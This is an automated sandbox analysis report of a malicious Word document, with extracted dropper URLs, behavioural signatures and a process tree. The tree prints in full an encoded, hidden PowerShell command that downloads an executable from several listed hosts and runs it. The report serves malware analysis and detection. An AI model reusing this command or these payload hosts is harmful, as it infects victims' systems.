Analysis
-
max time kernel
30s -
resource
win10v191014 -
submitted
20-12-2019 05:05
Task
task1
Sample
9e41bad2948eadda33dfc16e75a5e50e3e0d0babfa0767ec62357c94962ac7cb.doc
Resource
win10v191014
0 signatures
General
-
Target
9e41bad2948eadda33dfc16e75a5e50e3e0d0babfa0767ec62357c94962ac7cb
-
Sample
191220-xlsv9tw8mx
-
SHA256
9e41bad2948eadda33dfc16e75a5e50e3e0d0babfa0767ec62357c94962ac7cb
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
https://citationvie.com/wp-includes/F4E7VRR/
exe.dropper
https://tapucreative.com/wp-admin/ds54af/
exe.dropper
http://driventodaypodcast.com/megaphone/wrm/
exe.dropper
http://datrangsuc.com/wp-admin/Szzu2WcG/
exe.dropper
http://nguyenquocltd.com/wp-content/p7dl/
Signatures
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
WINWORD.EXEpid process 4980 WINWORD.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 4980 WINWORD.EXE -
Executes dropped EXE 1 IoCs
Processes:
604.exepid process 3688 604.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 4640 Powershell.exe -
Suspicious use of WriteProcessMemory 1 IoCs
Processes:
Powershell.exedescription pid process target process PID 4640 wrote to memory of 3688 4640 Powershell.exe 604.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description ioc Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4980 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4640 5100 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 4640 Powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9e41bad2948eadda33dfc16e75a5e50e3e0d0babfa0767ec62357c94962ac7cb.doc" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: AddClipboardFormatListener
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABOAGoAdAB4AHcAYgB3AGEAdgB4AD0AJwBRAGUAZwB4AGQAZQBsAGwAcQBqACcAOwAkAFIAcQBnAG0AYwBjAHIAbwBuAHYAbwBnAHUAIAA9ACAAJwA2ADAANAAnADsAJABCAGoAagBsAHMAdwBkAHcAdwBwAHgAeQB3AD0AJwBVAHAAawBvAHEAdABhAGsAaAB4AGsAYgBqACcAOwAkAFMAeQB4AGcAaABjAHkAYQBnAGMAaAByAHUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFIAcQBnAG0AYwBjAHIAbwBuAHYAbwBnAHUAKwAnAC4AZQB4AGUAJwA7ACQARQB1AGkAegB1AHIAbQBvAGMAYgBpAG0APQAnAEkAegBnAHYAcABxAGEAeQBhAHUAZAAnADsAJABOAG0AbwB2AGEAawBtAHIAZQBnAHIAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AdwBFAEIAQwBsAGkARQBOAHQAOwAkAEgAdwBvAGEAdABoAGMAYQBsAGoAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGkAdABhAHQAaQBvAG4AdgBpAGUALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEYANABFADcAVgBSAFIALwAqAGgAdAB0AHAAcwA6AC8ALwB0AGEAcAB1AGMAcgBlAGEAdABpAHYAZQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZABzADUANABhAGYALwAqAGgAdAB0AHAAOgAvAC8AZAByAGkAdgBlAG4AdABvAGQAYQB5AHAAbwBkAGMAYQBzAHQALgBjAG8AbQAvAG0AZQBnAGEAcABoAG8AbgBlAC8AdwByAG0ALwAqAGgAdAB0AHAAOgAvAC8AZABhAHQAcgBhAG4AZwBzAHUAYwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AUwB6AHoAdQAyAFcAYwBHAC8AKgBoAHQAdABwADoALwAvAG4AZwB1AHkAZQBuAHEAdQBvAGMAbAB0AGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBwADcAZABsAC8AJwAuACIAcwBQAGAATABpAFQAIgAoACcAKgAnACkAOwAkAEMAbgBpAHUAdQBkAGMAbABkAHAAdwBvAGYAPQAnAEkAbgBoAGgAZwB1AHkAeQAnADsAZgBvAHIAZQBhAGMAaAAoACQATgBwAHgAawBqAGMAaABwAGMAIABpAG4AIAAkAEgAdwBvAGEAdABoAGMAYQBsAGoAKQB7AHQAcgB5AHsAJABOAG0AbwB2AGEAawBtAHIAZQBnAHIALgAiAEQAYABPAGAAdwBOAEwAbwBhAEQARgBgAGkAbABlACIAKAAkAE4AcAB4AGsAagBjAGgAcABjACwAIAAkAFMAeQB4AGcAaABjAHkAYQBnAGMAaAByAHUAKQA7ACQAVQBiAHQAZgB0AG4AdwB0AHIAPQAnAFUAZwBvAGkAcwBlAGYAagAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFMAeQB4AGcAaABjAHkAYQBnAGMAaAByAHUAKQAuACIAbABFAGAATgBgAEcAVABIACIAIAAtAGcAZQAgADIANwA1ADYANgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAHQAQQBgAFIAdAAiACgAJABTAHkAeABnAGgAYwB5AGEAZwBjAGgAcgB1ACkAOwAkAEkAegBxAG4AbgB2AHUAZgBlAG8APQAnAEEAYwBpAGYAawBiAGEAdgBuAHkAegAnADsAYgByAGUAYQBrADsAJABTAHkAbgBxAHQAbwB1AGEAawA9ACcAUABnAGEAYQB6AG0AZgBtAHEAcwBvAGcAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVgBpAGoAbAB3AGsAYQBjAGcAdQB4AGcAbwA9ACcASgBuAHEAagBwAHAAZABiAHoAdgBiAHMAbgAnAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\604.exe"C:\Users\Admin\604.exe"2⤵
- Executes dropped EXE